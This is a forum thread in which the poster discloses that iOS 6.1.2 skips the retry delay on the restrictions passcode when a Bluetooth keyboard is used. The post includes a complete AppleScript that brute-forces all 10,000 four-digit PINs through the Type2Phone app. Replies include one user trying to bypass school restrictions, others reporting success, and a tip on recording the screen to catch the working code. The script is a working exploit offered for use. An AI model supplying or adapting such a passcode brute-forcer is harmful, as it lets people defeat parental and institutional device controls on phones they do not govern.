Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.

russellelly

macrumors regular
Original poster
Jun 23, 2006
139
41
Glasgow, UK
Hi,

I've found a vulnerability in iOS 6.1.2 on an iPhone 4S (probably there in other versions and for other iPhones/iPads/iPod Touches) that will allow you to brute force the restrictions passcode. Explanation is on a video at http://www.youtube.com/watch?v=dgvIdIScG0c , belowis some really simple AppleScript that I have written to exploit the vulnerability.

The gist of the solution is that iOS usually enforces a delay before re-entering a restrictions passcode after a number of failed attempts, but this is not enforced when using a bluetooth keyboard.

Enjoy!

Code:
-- Author Chris Russell
-- This script is designed to brute force the restrictions passcode on iPhone
-- Assumptions:
--   Blutooth is enabled
--   Type2Phone App is running and connected to your phone (avail on Mac App Store)
-- iPhone is switched on and on the restrictions passcode screen (General - Restrictions)
global pinCodeDigit1
global pinCodeDigit2
global pinCodeDigit3
global pinCodeDigit4

set pinCodeDigit1 to 0
set pinCodeDigit2 to 0
set pinCodeDigit3 to 0
set pinCodeDigit4 to 0

on keyStrokeNumber(num)
	if (num = 0) then
		tell application "System Events" to keystroke "0"
	else if (num = 1) then
		tell application "System Events" to keystroke "1"
	else if (num = 2) then
		tell application "System Events" to keystroke "2"
	else if (num = 3) then
		tell application "System Events" to keystroke "3"
	else if (num = 4) then
		tell application "System Events" to keystroke "4"
	else if (num = 5) then
		tell application "System Events" to keystroke "5"
	else if (num = 6) then
		tell application "System Events" to keystroke "6"
	else if (num = 7) then
		tell application "System Events" to keystroke "7"
	else if (num = 8) then
		tell application "System Events" to keystroke "8"
	else if (num = 9) then
		tell application "System Events" to keystroke "9"
	end if
end keyStrokeNumber

to incrementPIN()
	if (pinCodeDigit4 = 9) then
		if (pinCodeDigit3 = 9) then
			if (pinCodeDigit2 = 9) then
				set pinCodeDigit1 to pinCodeDigit1 + 1
				set pinCodeDigit2 to 0
				set pinCodeDigit3 to 0
				set pinCodeDigit4 to 0
			else
				set pinCodeDigit2 to pinCodeDigit2 + 1
				set pinCodeDigit3 to 0
				set pinCodeDigit4 to 0
			end if
		else
			set pinCodeDigit3 to pinCodeDigit3 + 1
			set pinCodeDigit4 to 0
		end if
	else
		set pinCodeDigit4 to pinCodeDigit4 + 1
	end if
end incrementPIN

to tryPin()
	keyStrokeNumber(pinCodeDigit1)
	keyStrokeNumber(pinCodeDigit2)
	keyStrokeNumber(pinCodeDigit3)
	keyStrokeNumber(pinCodeDigit4)
	delay 1
end tryPin

try
	«event ascrgdut»
end try

-- main application, simple ;)
tell application "Type2Phone" to activate
repeat 10000 times
	tryPin()
	incrementPIN()
end repeat
 
Last edited:
I'm hoping this works, trying to get around my schools restrictions. I tried using a plist editor but since my iPad is encrypted I can only find the code if I payed $25.

Edit: I just watched your video and it seems very legit, but after a certain amount of failed attempts doesn't it lock out out and the time grows after each wrong code?
 
I'm hoping this works, trying to get around my schools restrictions. I tried using a plist editor but since my iPad is encrypted I can only find the code if I payed $25.

Edit: I just watched your video and it seems very legit, but after a certain amount of failed attempts doesn't it lock out out and the time grows after each wrong code?

Sorry for slow reply, didn't get a notification on your post :confused:

I've seen reports of a maximum 10 attempt restriction, but as you saw in the video it doesn't seem to exist. It _may_ be connected to the option 'Erase Data' under the 'Passcode Lock' settings, but I think this only applies to failed passcode lock attempts. Someone on the YouTube comments reports the script getting a 9999 code (the final one the script would try!), so it looks safe. As ever, backup first just in case :)
 
Russellelly, thank you so much for this script. It worked like a charm with Type2Phone to get me back in my iphone.

Folks be sure to be insight of your iphone so you can have an idea of what the correct password was since the script will continue to run. I missed it the first time so I ran the script again but changed it to start with 2000. In no time it guessed it right.

this saved me so much time since now I don't have to reinstall apps or configure all my settings.

Jerry
 
Other apps

Will this work with another keyboard app? I am asking because type2phone is a paid app and I am broke.
 
This is great it worked for me. But I wasn't around when it done it so I never got the code. Is there away to make it stop or highlight the correct combination?

Am no good with script but I do very much appreciate you doing this as I couldn't find the pin with plist editor and I don't want to loose my contacts and notes restoring to new.

Any suggestions on how to narrow it down would be appreciated too
 
This is great it worked for me. But I wasn't around when it done it so I never got the code. Is there away to make it stop or highlight the correct combination?

Am no good with script but I do very much appreciate you doing this as I couldn't find the pin with plist editor and I don't want to loose my contacts and notes restoring to new.

Any suggestions on how to narrow it down would be appreciated too

Record it while its running and then play the video at like 4x or even 8x until you find where it got the correct passcode
 
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.